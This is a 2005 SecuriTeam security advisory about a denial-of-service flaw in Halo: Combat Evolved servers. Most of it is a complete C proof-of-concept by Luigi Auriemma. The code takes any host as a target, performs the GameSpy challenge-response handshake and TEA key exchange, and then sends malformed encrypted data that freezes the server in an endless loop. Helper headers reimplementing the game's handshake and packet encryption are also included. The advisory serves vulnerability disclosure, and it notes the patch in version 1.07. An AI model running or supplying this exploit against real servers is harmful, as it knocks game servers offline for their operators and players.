[NT] Halo: Combat Evolved DoS
From: SecuriTeam (support_at_securiteam.com)
Date: 05/26/05
- Previous message: SecuriTeam: "[NEWS] Neoteris IVE changepassword.cgi Authentication Bypass"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 26 May 2005 17:51:36 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Halo: Combat Evolved DoS
------------------------------------------------------------------------
SUMMARY
<http://www.microsoft.com/games/pc/halo.aspx> Halo is the great FPS game
developed by Bungie Studios and ported on PC by
<http://www.gearboxsoftware.com> Gearbox Software. It is published by
<http://www.microsoft.com/games/> Microsoft Games and has been released at
the end of 2003.
Attackers sending the Halo server malformed data can cause it to no longer
respond to legitimate requests allowing attackers to cause a denial of
service against the product.
DETAILS
Vulnerable Systems:
* Halo: Combat Evolved versions 1.06 and prior
* Halo: Combat Evolved Custom Edition version 1.00
Immune Systems:
* Halo: Combat Evolved version 1.07
The game is not able to handle the malformed data with the consequence of
entering in an endless loop that continues to check the same data. The
effects are that the server freezes completely, so is no longer able to
handle packets, and the CPU goes to 100%.
Patch Availability:
The upcoming version 1.07 should be released in these days, the bug has
been reported to the developers exactly one month ago.
Proof of Concept:
/*
by Luigi Auriemma - http://aluigi.altervista.org/poc/haloloop.zip
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "gssdkcr.h"
#include "halo_pck_algo.h"
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#define ONESEC 1
#endif
#define VER "0.1"
#define BUFFSZ 8192
#define PORT 2302
#define TIMEOUT 1
#define BOOMSZ 16 // minimum is 4
#define ADDMEM(x,y) memcpy(p, x, y); \
p += y;
#define ADDINT(x) *(u_int *)p = x; \
p += 4;
#define SEND(x,y) if(sendto(sd, x, y, 0, (struct sockaddr *)&peer,
sizeof(peer)) \
< 0) std_err();
#define RECV(x,y) len = recvfrom(sd, x, y, 0, NULL, NULL); \
if(len < 0) std_err();
#define SOCKTOUT if(len < 0) { \
fputs("\nError: socket timeout, no reply
received\n\n", stdout); \
exit(1); \
}
int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz);
int show_info(u_char *data, int len);
int timeout(int sock);
u_int resolv(char *host);
void std_err(void);
struct sockaddr_in peer;
int main(int argc, char *argv[]) {
int sd,
len,
ver;
u_short port = PORT;
u_char buff[BUFFSZ + 1],
info[] =
"\xfe\xfd" "\x00" "\x00\x00\x00\x00" "\xff\x00\x00",
enckey[16],
deckey[16],
*psdk,
*p;
#pragma pack(1) // a basic header
struct gssdk_header {
u_short sign;
u_char type;
u_short gs1;
u_short gs2;
} *gh;
#pragma pack()
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"Halo <= 1.06 endless loop "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@altervista.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <host> [port(%d)]\n"
"\n", argv[0], port);
exit(1);
}
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
fputs("- request informations:\n", stdout);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
*(u_int *)(info + 3) = ~time(NULL);
len = send_recv(sd, info, sizeof(info) - 1, buff, BUFFSZ);
close(sd);
SOCKTOUT;
buff[len] = 0x00;
ver = show_info(buff, len);
if(ver <= 0) {
fputs("\nError: the server version has not been found, it is
needed to join\n\n", stdout);
exit(1);
}
printf("\n- use version: %d\n", ver);
gh = (struct gssdk_header *)buff;
psdk = buff + 7;
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
gh->sign = htons(0xfefe);
gh->type = 1;
gh->gs1 = htons(0);
gh->gs2 = htons(0);
memset(psdk, '0', 32);
gssdkcr(psdk, psdk, 0);
len = send_recv(sd, buff, 39, buff, BUFFSZ);
SOCKTOUT;
if((gh->type != 2) || (ntohs(gh->gs1) != 0) || (ntohs(gh->gs2) != 1))
{
fputs("\n the first packet doesn't seem to have been accepted, I
continue\n", stdout);
}
gh->sign = htons(0xfefe);
gh->type = 3;
gh->gs1 = htons(1);
gh->gs2 = htons(1);
gssdkcr(psdk, buff + 39, 0);
p = psdk + 32;
halo_generate_keys(NULL, enckey);
ADDMEM(enckey, 16);
ADDINT(ver);
len = send_recv(sd, buff, p - buff, buff, BUFFSZ);
SOCKTOUT;
for(;;) {
if((gh->type == 4) && (ntohs(gh->gs1) == 1) && (ntohs(gh->gs2) ==
2)) {
halo_generate_keys(psdk, deckey);
halo_generate_keys(psdk, enckey);
}
if(!gh->type) {
fputs("- connection accepted\n", stdout);
halo_tea_decrypt(buff + 7, len - 7, deckey);
gh->sign = htons(0xfefe);
gh->type = 0;
gh->gs1 = htons(2);
gh->gs2 = htons(3);
memset(psdk, 0xff, BOOMSZ); // malformed data
len = BOOMSZ;
*(u_int *)(psdk + len) = halo_crc32(psdk, len);
len += 4;
halo_tea_encrypt(psdk, len, enckey);
len += 7;
fputs("- send malformed data\n", stdout);
len = send_recv(sd, buff, len, buff, BUFFSZ);
if(len < 0) break;
}
if((gh->type == 5) && (ntohs(gh->gs1) == 1) && (ntohs(gh->gs2) ==
2)) {
fputs("\n"
"Error: server is full or has not accepted the connection
so cannot be tested.\n"
" Retry later\n"
"\n", stdout);
exit(1);
}
if(timeout(sd) < 0) break;
RECV(buff, BUFFSZ);
}
close(sd);
fputs("- check server:\n", stdout);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
len = send_recv(sd, info, sizeof(info) - 1, buff, BUFFSZ);
close(sd);
if(len < 0) {
fputs("\nServer IS vulnerable!!!\n\n", stdout);
} else {
fputs("\nServer doesn't seem vulnerable\n\n", stdout);
}
return(0);
}
int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz) {
int i,
len;
for(i = 3; i; i--) {
SEND(in, insz);
if(!timeout(sd)) break;
}
if(!i) return(-1);
RECV(out, outsz);
return(len);
}
int show_info(u_char *data, int len) {
u_char *v,
*limit = data + len;
int nt = 0,
d,
ver = -1;
data += 5;
while(data < limit) {
d = strlen(data);
if(nt & 1) {
if(!ver) {
v = strrchr(data, '.');
if(v) ver = atoi(v + 1) * 1000;
}
printf("%s\n", data);
} else {
if(!d) break;
if(!strcmp(data, "gamever")) ver = 0;
printf("%30s: ", data);
}
data += d + 1;
nt++;
}
return(ver);
}
int timeout(int sock) {
struct timeval tout;
fd_set fd_read;
int err;
tout.tv_sec = TIMEOUT;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}
u_int resolv(char *host) {
struct hostent *hp;
u_int host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_int *)hp->h_addr;
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
gssdkcr.h:
/*
GS SDK challenge-response algorithm 0.1
by Luigi Auriemma
e-mail: aluigi@autistici.org
web: http://aluigi.altervista.org
INTRODUCTION
-===========
This algorithm is referred to the challenge-response method used by some
of the games that use the Gamespy SDK like Halo and Soldier of Anarchy.
This handshake is used to let valid client to join the game servers, in
fact if clients answer with a wrong response they are immediately kicked.
If we get Halo as practical example we can see that we have the
following 3 packets easily visible using a packet analyzer:
- client -> server: client challenge (a text string of 32 chars)
- server -> client: response to the client's challenge plus the
server's challenge
- client -> server: response calculated on the server's challenge
HOW TO USE
-=========
The function gssdkcr() requires the following parameters:
- the destination buffer that will contain the resulted string.
It must be 33 bytes long (32 plus the final NULL byte).
- the "challenge" string (sent by the server or by the client).
- the buffer containing the game's text string used for the calculation
of the response.
By default the Gamespy SDK uses 3b8dd8995f7c40a9a5c5b7dd5b481341 but
some games might use different values like Soldier of Anarchy that
uses 0AB3F935936211D19A2B080000300512 (the CLSID of the game).
However if the value is NULL, will be used the default value.
The return value is a pointer to the destination string.
EXAMPLE
-======
In Halo for example we must use:
char resp[33],
chall[] = ")nTu4y&t,Cr{P5j{6k<]^E@-ToF#Kg>m";
gssdkcr(resp, chall, 0);
while in Soldier of Anarchy we must change this one:
gssdkcr(resp, chall, "0AB3F935936211D19A2B080000300512");
LICENSE
-======
Copyright 2004 Luigi Auriemma
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
USA
http://www.gnu.org/licenses/gpl.txt
*/
#include <time.h>
unsigned char *gssdkcr(
unsigned char *dst,
unsigned char *src,
unsigned char *key) {
unsigned int oz,
i,
keysz,
count,
old,
tmp,
randnum;
unsigned char *ptr;
const static char
key_default[] =
"3b8dd8995f7c40a9a5c5b7dd5b481341";
randnum = time(NULL); // something random
if(!key) key = (unsigned char *)key_default;
keysz = strlen(key);
ptr = src;
old = *ptr;
tmp = old < 0x4f;
count = 0;
for(oz = i = 1; i < 32; i++) {
count ^= ((((*ptr < old) ^ ((old ^ i) & 1)) ^ (*ptr & 1)) ^ tmp);
ptr++;
if(count) {
if(!(*ptr & 1)) { oz = 0; break; }
} else {
if(*ptr & 1) { oz = 0; break; }
}
}
ptr = dst;
for(i = 0; i < 32; i++, ptr++) {
if(!oz || !i || (i == 13)) {
randnum = (randnum * 0x343FD) + 0x269EC3;
*ptr = (((randnum >> 16) & 0x7fff) % 93) + 33;
continue;
} else if((i == 1) || (i == 14)) {
old = src[i];
} else {
old = src[i - 1];
}
tmp = (old * i) * 17991;
old = src[(key[(src[i] + i) % keysz] + (src[i] * i)) & 31];
*ptr = ((old ^ key[tmp % keysz]) % 93) + 33;
}
*ptr = 0x00;
return(dst);
}
halo_pck_algo.h:
/*
Halo packets decryption/encryption algorithm and keys builder 0.1.1
by Luigi Auriemma
e-mail: aluigi@autistici.org
web: http://aluigi.altervista.org
INTRODUCTION
-===========
As you know Halo uses encrypted packets and the set of functions
available here is all you need to decrypt and encrypt the packets of
this game.
It's a bit complex to explain the details of the algorithm moreover for
me since I have no knowledge of cryptography, however it uses the TEA
algorithm to encrypt and decrypt the packets and exist 2 keys exchanged
between the 2 hosts but is not possible for a third person to decrypt
the data between them due to the usage of this nice method to handle
keys (also if you catch the exchanged keys you will be not able to
decrypt the stuff).
FYI, the data in the packets is stored in bitstream format and the
latest 4 bytes are a classical 32 bits checksum of the packet, so keep
that in mind.
HOW TO USE
-=========
First, you need to specify the following buffers in your program:
u_char enckey[16], // used to encrypt
deckey[16]; // used to decrypt
You need only 3 functions to do everything but there are many others
available in this file so you have the maximum freedom of using your
preferred way to handle the keys and the data:
- halo_generate_keys()
needs 2 arguments, the source key and the destination key
(automatically zeroed by the halo_create_key() function).
This function must be called the first time to send the key to the
other host and other 2 consecutive times to calculate the decryption
and encryption key.
To create your key use NULL as source key and a buffer of 16 bytes
that will contain the generated key as destination.
Example: halo_generate_keys(NULL, basekey); // use a temporary
buffer
To create the decryption and encryption keys use the key received from
the other host as source and a buffer of 16 bytes as destination.
Example: halo_generate_keys(packet_buffer + 7, deckey);
halo_generate_keys(packet_buffer + 7, enckey);
- void halo_tea_decrypt()
needs 3 arguments, the buffer to decrypt, its size and the decryption
key previously generated with the halo_generate_keys() function:
halo_tea_decrypt(buffer, len, deckey);
- void halo_tea_encrypt()
needs 3 arguments, the buffer to encrypt, its size and the encryption
key previously generated:
halo_tea_encrypt(buffer, len, enckey);
Useful is also the halo_crc32() function that calculates the CRC number
that must be placed at the end of each packet. The data that must be
passed to the function usually starts at offset 7 of each packet, the
same resulted from the decryption/encryption. Remember that the size
must not contain the last 4 bytes occupied by the checksum.
REAL EXAMPLES
-============
Check the stuff I have written for Halo on my website:
http://aluigi.altervista.org/papers.htm#halo
LICENSE
-======
Copyright 2005 Luigi Auriemma
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
USA
http://www.gnu.org/licenses/gpl.txt
*/
#include <string.h>
#include <time.h>
#ifndef __u_char_defined
typedef unsigned char u_char;
typedef unsigned long u_long;
#endif
void halo_create_randhash(u_char *out) {
u_long randnum;
int i;
const static char hex[] = "0123456789ABCDEF";
randnum = time(NULL);
for(i = 0; i < 16; i++) {
randnum = (randnum * 0x343FD) + 0x269EC3;
*out++ = hex[(randnum >> 16) & 15];
}
*out = 0x00;
}
void halo_byte2hex(u_char *in, u_char *out) {
int i;
const static char hex[] = "0123456789ABCDEF";
for(i = 16; i; i--) {
if(*in) break;
in++;
}
while(i--) {
*out++ = hex[*in >> 4];
*out++ = hex[*in & 15];
in++;
}
*out = 0x00;
}
void halo_hex2byte(u_char *in, u_char *out) {
int i,
j,
t;
memset(out, 0x00, 16);
while(*in) {
for(j = 0; j < 4; j++) {
t = 0;
for(i = 15; i >= 0; i--) {
t += (out[i] << 1);
out[i] = t;
t >>= 8;
}
}
t = *in |= 0x20;
out[15] |= ((t - (0x27 * (t > 0x60))) - 0x30);
in++;
}
}
void halo_fix_check(u_char *key1, u_char *key2) {
int i,
j;
for(i = 0; i < 16; i++) {
if(key1[i] != key2[i]) break;
}
if((i < 16) && (key1[i] > key2[i])) {
for(j = 0, i = 16; i--; j >>= 8) {
j += (key1[i] - key2[i]);
key1[i] = j;
}
}
}
void halo_key_scramble(u_char *key1, u_char *key2, u_char *fixnumb) {
int i,
j,
cnt;
u_char tk1[16],
tk2[16];
memcpy(tk1, key1, 16);
memcpy(tk2, key2, 16);
memset(key1, 0x00, 16);
cnt = 16 << 3;
while(cnt--) {
if(tk1[15] & 1) {
for(j = 0, i = 16; i--; j >>= 8) {
j += key1[i] + tk2[i];
key1[i] = j;
}
halo_fix_check(key1, fixnumb);
}
for(j = i = 0; i < 16; i++, j <<= 8) {
j |= tk1[i];
tk1[i] = j >> 1;
j &= 1;
}
for(j = 0, i = 16; i--; j >>= 8) {
j += (tk2[i] << 1);
tk2[i] = j;
}
halo_fix_check(tk2, fixnumb);
}
}
void halo_create_key(u_char *keystr, u_char *randhash, u_char *fixnum,
u_char *dest) {
int i,
j,
cnt;
static u_char keystrb[16],
randhashb[16],
fixnumb[16];
halo_hex2byte(keystr, keystrb);
halo_hex2byte(randhash, randhashb);
halo_hex2byte(fixnum, fixnumb);
memset(dest, 0x00, 16);
dest[15] = 0x01;
cnt = 16 << 3;
while(cnt--) {
if(randhashb[15] & 1) {
halo_key_scramble(dest, keystrb, fixnumb);
}
halo_key_scramble(keystrb, keystrb, fixnumb);
for(j = i = 0; i < 16; i++, j <<= 8) {
j |= randhashb[i];
randhashb[i] = j >> 1;
j &= 1;
}
}
}
void tea_decrypt(u_long *p, u_long *keyl) {
u_long y,
z,
sum,
a = keyl[0],
b = keyl[1],
c = keyl[2],
d = keyl[3];
int i;
y = p[0];
z = p[1];
sum = 0xc6ef3720;
for(i = 0; i < 32; i++) {
z -= ((y << 4) + c) ^ (y + sum) ^ ((y >> 5) + d);
y -= ((z << 4) + a) ^ (z + sum) ^ ((z >> 5) + b);
sum -= 0x9e3779b9;
}
p[0] = y;
p[1] = z;
}
void halo_tea_decrypt(u_char *data, int size, u_char *key) {
u_long *p = (u_long *)data,
*keyl = (u_long *)key;
if(size & 7) {
tea_decrypt((u_long *)(data + size - 8), keyl);
}
size >>= 3;
while(size--) {
tea_decrypt(p, keyl);
p += 2;
}
}
void tea_encrypt(u_long *p, u_long *keyl) {
u_long y,
z,
sum,
a = keyl[0],
b = keyl[1],
c = keyl[2],
d = keyl[3];
int i;
y = p[0];
z = p[1];
sum = 0;
for(i = 0; i < 32; i++) {
sum += 0x9e3779b9;
y += ((z << 4) + a) ^ (z + sum) ^ ((z >> 5) + b);
z += ((y << 4) + c) ^ (y + sum) ^ ((y >> 5) + d);
}
p[0] = y;
p[1] = z;
}
void halo_tea_encrypt(u_char *data, int size, u_char *key) {
u_long *p = (u_long *)data,
*keyl = (u_long *)key;
int rest = size & 7;
size >>= 3;
while(size--) {
tea_encrypt(p, keyl);
p += 2;
}
if(rest) {
tea_encrypt((u_long *)((u_char *)p - (8 - rest)), keyl);
}
}
void halo_generate_keys(u_char *source_key, u_char *dest_key) {
static u_char tmp_key[33] = "3",
fixed_key[33] = "10001",
randhash[17];
if(!source_key) { // encryption
halo_create_randhash(randhash);
} else {
halo_byte2hex(source_key, tmp_key);
}
source_key = tmp_key;
halo_create_key(source_key, randhash, fixed_key, dest_key);
}
u_long halo_crc32(u_char *data, int size) {
const static u_long crctable[] = {
0x00000000, 0x77073096, 0xee0e612c, 0x990951ba,
0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3,
0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988,
0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91,
0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de,
0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7,
0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec,
0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5,
0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172,
0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b,
0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940,
0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59,
0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116,
0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f,
0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,
0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d,
0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a,
0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433,
0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818,
0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01,
0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e,
0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457,
0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c,
0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65,
0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2,
0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb,
0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0,
0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9,
0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086,
0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,
0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4,
0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad,
0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a,
0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683,
0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8,
0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1,
0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe,
0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7,
0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc,
0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5,
0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252,
0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b,
0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60,
0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79,
0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236,
0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f,
0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04,
0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d,
0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a,
0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713,
0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38,
0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21,
0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e,
0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777,
0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c,
0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45,
0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2,
0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db,
0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0,
0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,
0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6,
0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf,
0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94,
0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d };
u_long crc = 0xffffffffL;
while(size--) {
crc = crctable[(*data ^ crc) & 0xff] ^ (crc >> 8);
data++;
}
return(crc);
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:aluigi@autistici.org> Luigi
Auriemma.
The original article can be found at: <http://aluigi.altervista.org>
http://aluigi.altervista.org
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NEWS] Neoteris IVE changepassword.cgi Authentication Bypass"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
